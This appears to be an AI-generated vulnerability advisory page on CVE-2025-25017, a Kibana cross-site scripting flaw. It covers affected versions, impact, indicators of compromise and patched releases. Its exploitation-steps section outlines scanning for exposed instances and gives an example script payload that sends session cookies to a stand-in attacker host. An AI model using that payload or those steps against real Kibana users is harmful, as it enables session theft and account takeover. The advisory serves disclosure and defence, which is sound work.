CVE-2025-25017
Kibana vulnerability analysis and mitigation

Overview

CVE-2025-25017 is a Cross-Site Scripting (XSS) vulnerability in Elastic Kibana caused by improper neutralization of input during web page generation (CWE-79). It affects Kibana versions 7.0.0 through 8.18.7, 8.19.0 through 8.19.3, 9.0.0 through 9.0.6, and 9.1.0 through 9.1.3. The vulnerability was published on October 10, 2025, and patches were released in the same timeframe. The CVSS v3.1 base score is 6.1 (Medium) per NVD, though ENISA's EUVD rates it 8.2 (High) with a broader integrity impact assessment (Elastic Advisory, ENISA EUVD).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting). Attackers can inject malicious scripts into Kibana web pages that are then rendered in victims' browsers, exploiting insufficient input sanitization or output encoding within the application. The attack vector is network-based, requires no privileges, but does require user interaction (e.g., a victim visiting a crafted or compromised Kibana page). The vulnerability has been associated with Kibana's Vega visualization component based on community analysis (ZeroPath Blog, Elastic Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim's browser session within Kibana. This can lead to theft of session tokens, credential harvesting, unauthorized actions performed on behalf of the authenticated user, and potential bypass of access controls. While availability is not directly impacted, confidentiality and integrity are both at risk, particularly for users with elevated Kibana privileges such as administrators (Elastic Advisory, ENISA EUVD).

Exploitability

As of the time of reporting, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation. The EPSS score is approximately 0.029% (0.000290), indicating a low probability of exploitation in the near term. The vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported (Feedly, ENISA EUVD).

Exploitation steps

  1. Reconnaissance: Identify publicly accessible Kibana instances running affected versions (7.0.0–8.18.7, 8.19.0–8.19.3, 9.0.0–9.0.6, or 9.1.0–9.1.3) using tools like Shodan or Censys.
  2. Identify injection point: Locate a Kibana feature that accepts user-controlled input rendered in the browser — community analysis points to the Vega visualization component as a likely vector.
  3. Craft malicious payload: Construct an XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) embedded within a Vega visualization configuration or another injectable field.
  4. Deliver payload: Trick an authenticated Kibana user into opening a shared dashboard, visualization link, or crafted URL containing the malicious payload (user interaction required).
  5. Achieve objective: Upon victim interaction, the injected script executes in their browser, enabling session token theft, credential harvesting, or unauthorized API actions within Kibana (ZeroPath Blog, Elastic Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from users' browsers to unknown external domains shortly after accessing Kibana dashboards or visualizations; unusual POST requests to attacker-controlled endpoints containing encoded cookie or token data.
  • Logs: Kibana access logs showing unusual or encoded parameters in visualization or dashboard URLs; repeated access to shared dashboard links from multiple user accounts in a short timeframe.
  • Browser/Application: Unexpected JavaScript execution errors in browser console logs when loading Kibana dashboards; users reporting unexpected redirects or pop-ups within the Kibana interface.
  • Session: Anomalous Kibana API calls (e.g., index pattern changes, user management actions) originating from legitimate user sessions at unusual times, potentially indicating session hijacking (Elastic Advisory).

Mitigation and workarounds

Elastic has released patched versions addressing CVE-2025-25017: 8.18.8, 8.19.4, 9.0.7, and 9.1.4. Organizations should upgrade to one of these versions as the primary remediation. As interim mitigations, administrators should implement a strict Content Security Policy (CSP), restrict access to Kibana to trusted networks or authenticated users only, and limit sharing of dashboards and visualizations to trusted internal users. Monitoring for suspicious script execution and unusual outbound connections from browser sessions is also recommended (Elastic Advisory).

Community reactions

The vulnerability received coverage from security news outlets and threat intelligence platforms shortly after disclosure. SecurityOnline.info reported on Elastic's fixes for multiple high-severity Kibana and Elasticsearch vulnerabilities. The NetEye blog published a security advisory for Elastic Stack users. Black Kite included CVE-2025-25017 in its TPRM (Third-Party Risk Management) weekly digest, highlighting it as a notable vendor risk. Community discussion on LinkedIn also noted the XSS risks in Kibana (SecurityOnline, NetEye Blog, Black Kite).

Additional resources


SourceThis report was generated using AI

Related Kibana vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-72677HIGH7.3
  • Kibana logoKibana
  • kibana-8.19
NoYesAug 13, 2026
CVE-2026-72675HIGH7.1
  • Kibana logoKibana
  • cpe:2.3:a:elastic:kibana
NoYesAug 13, 2026
CVE-2026-72681MEDIUM6.5
  • Kibana logoKibana
  • cpe:2.3:a:elastic:kibana
NoYesAug 13, 2026
CVE-2026-72680MEDIUM6.5
  • Kibana logoKibana
  • cpe:2.3:a:elastic:kibana
NoYesAug 13, 2026
CVE-2026-72674MEDIUM6.5
  • Kibana logoKibana
  • kibana-9.3
NoYesAug 13, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management